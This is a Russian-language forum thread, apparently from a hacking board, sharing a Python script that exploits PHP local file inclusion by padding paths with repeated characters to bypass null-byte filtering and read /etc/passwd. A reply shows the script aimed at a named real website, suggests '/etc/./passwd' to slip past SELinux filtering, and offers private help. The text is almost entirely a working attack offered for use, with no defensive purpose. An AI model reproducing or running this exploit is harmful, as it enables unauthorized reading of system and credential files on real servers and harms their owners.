Данный метод работает во всех версиях php кроме последней 5.3.3 Смысл в том, чтобы забивать путь в начале файла произвольными символами. Code: #!/usr/bin/env python # Null byte filter bypass import urllib, sys if len(sys.argv) < 2: print "Use: fazzer <url> [file] [true]: " exit() file = "../../../../../../../etc/passwd"; true = "root" if len(sys.argv) > 3: file = sys.argv[2] true = sys.argv[3] url = sys.argv[1] for i in xrange(900, 4096): sys.stderr.write("\rTry: " + str(i)) d = "t" * i try: fd = urllib.urlopen(url + d + file) except: print "Error connect" sys.exit(1) data = fd.read() fd.close() if data.find(true) > -1: print '\n', data exit(0)
Не согласен, вполне нормально работает. К примеру: python fazzer.py "http://www.bela.bg/?page_id=9&article_id=1000220&coments=yes&page=" Try: 4041 Возможно у тебя selinux блочит запросы напрямую в урле, если видит /etc/passwd. Пробуй /etc/./passwd Если не получится скинь в приват, я посмотрю.
